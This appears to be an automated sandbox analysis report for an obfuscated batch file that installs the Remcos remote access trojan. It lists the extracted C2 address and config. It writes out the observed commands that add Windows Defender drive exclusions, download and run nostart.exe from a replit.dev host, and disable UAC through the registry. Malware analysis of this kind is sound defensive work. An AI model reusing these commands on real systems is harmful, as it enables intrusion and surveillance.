Overview

overview

10

Static

static

1

New Text D...bf.bat

windows10-ltsc 2021-x64

10

New Text D...bf.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    09-11-2024 14:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    New Text Document_obf.bat

  • Size

    1KB

  • MD5

    4f4e694e3986ffa9959b38e093d9da44

  • SHA1

    3a2670365ed398a60c5a7f86ecd8778e295e3bef

  • SHA256

    0ccdb4a818091ae2e5725a7f1ba92487576df540f9f3a197fc0ae38ddda480cb

  • SHA512

    7194250b629770adb40f76ba28dcdde5f0f78351623c046ee44e3a92ae0835810e391fce1b2c47f0ac0c88ba7f20742d18175e221e28f3b0e37638a787d1f4dc

Score
10/10
remcosremotehostdiscoveryevasionexecutionrattrojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

194.59.31.143:4444

Attributes
  • audio_folder

    xboxGameBar

  • audio_path

    %SystemDrive%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    ploi.exe

  • copy_folder

    koi

  • delete_file

    true

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %SystemDrive%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-ZU01ZO

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • UAC bypass 3 TTPs 2 IoCs
    evasiontrojan
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New Text Document_obf.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3180
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:3340
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wmic logicaldisk get name | find ":"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2928
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic logicaldisk get name
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3868
        • C:\Windows\system32\find.exe
          find ":"
          3⤵
            PID:3056
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5088
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath 'D:\'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath 'F:\'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:840
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "try { Invoke-WebRequest -Uri 'https://209a4381-e3eb-466a-9efc-fca8d71e6314-00-2bl68nwmi4jw4.kirk.replit.dev/nostart.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\nostart.exe' } catch { exit 1 }"
          2⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4412
        • C:\Users\Admin\AppData\Local\Temp\nostart.exe
          "C:\Users\Admin\AppData\Local\Temp\nostart.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1080
          • C:\Windows\SysWOW64\cmd.exe
            /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3080
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
              4⤵
              • UAC bypass
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:1876
          • \??\c:\program files (x86)\internet explorer\iexplore.exe
            "c:\program files (x86)\internet explorer\iexplore.exe"
            3⤵
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:1760
            • C:\Windows\SysWOW64\cmd.exe
              /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3844
              • C:\Windows\SysWOW64\reg.exe
                C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                5⤵
                • UAC bypass
                • System Location Discovery: System Language Discovery
                • Modifies registry key
                PID:3120
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              4⤵
                PID:5020

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          627073ee3ca9676911bee35548eff2b8

          SHA1

          4c4b68c65e2cab9864b51167d710aa29ebdcff2e

          SHA256

          85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

          SHA512

          3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          1a9fa92a4f2e2ec9e244d43a6a4f8fb9

          SHA1

          9910190edfaccece1dfcc1d92e357772f5dae8f7

          SHA256

          0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

          SHA512

          5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          5b705b4839f481b2485f2195c589cad0

          SHA1

          a55866cd9e6fedf352d0e937101755ea61a50c86

          SHA256

          f6a3b94a63de605bbbcf1e95cb2d743166f44ea7e9d0d2bfa0e88c94c26e37c6

          SHA512

          f228eccd5646068a81e79baeaf7e8bfa470b30d503bf0ca8cc746c009510ab609b5c091cadf08fab1e3581900cdb7834c775c61a95a29c2d73ccd0dcbd851bab

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          a13d86aa4aa93ee4e7b6a655edf6cc79

          SHA1

          b3172c58361cfc52fe51b7bd2971df38657e77db

          SHA256

          d42c42ef46ed4341b7eb52572aa6c7bc7720401481c93b38d6cc7cbf00826066

          SHA512

          6e55311ca9f9ec756eac30841c9564a679089b7a249a6d5841e97e7bc73e5dd213bd7683856b740bbae2fa46456558558f52ec78b4460ef932d363d3e7800fbf

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xvpgym05.fll.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\nostart.exe
          Filesize

          481KB

          MD5

          3a57301d5b27cf1ef1f634af4950f593

          SHA1

          fd21a65c2272ef3bb05521994022e56ab017b494

          SHA256

          8df3bcdf64bbc3752bcdc19b64fc50aaff8333c78f470e52a96001c7a7529318

          SHA512

          d0392099fcbb5c5e50732213d666b96b5e17c7c50ddfecad35b7930111d08c3d39d067bd9774fb7a430db68f8c84d51e863ee4b39f274329d62918610093b80c

          Download Submit

        • memory/1760-52-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-59-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-73-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-72-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-70-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-71-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-51-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-53-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-68-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-69-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-56-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-66-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-60-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-67-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-61-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-64-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/1760-65-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

          Download

        • memory/5020-58-0x0000000000440000-0x00000000004BF000-memory.dmp

          Filesize

          508KB

          Download

        • memory/5020-57-0x0000000000440000-0x00000000004BF000-memory.dmp

          Filesize

          508KB

          Download

        • memory/5088-15-0x00007FFA50570000-0x00007FFA51032000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/5088-0-0x00007FFA50573000-0x00007FFA50575000-memory.dmp

          Filesize

          8KB

          Download

        • memory/5088-9-0x0000020FD8E50000-0x0000020FD8E72000-memory.dmp

          Filesize

          136KB

          Download

        • memory/5088-10-0x00007FFA50570000-0x00007FFA51032000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/5088-11-0x00007FFA50570000-0x00007FFA51032000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/5088-12-0x00007FFA50570000-0x00007FFA51032000-memory.dmp

          Filesize

          10.8MB

          Download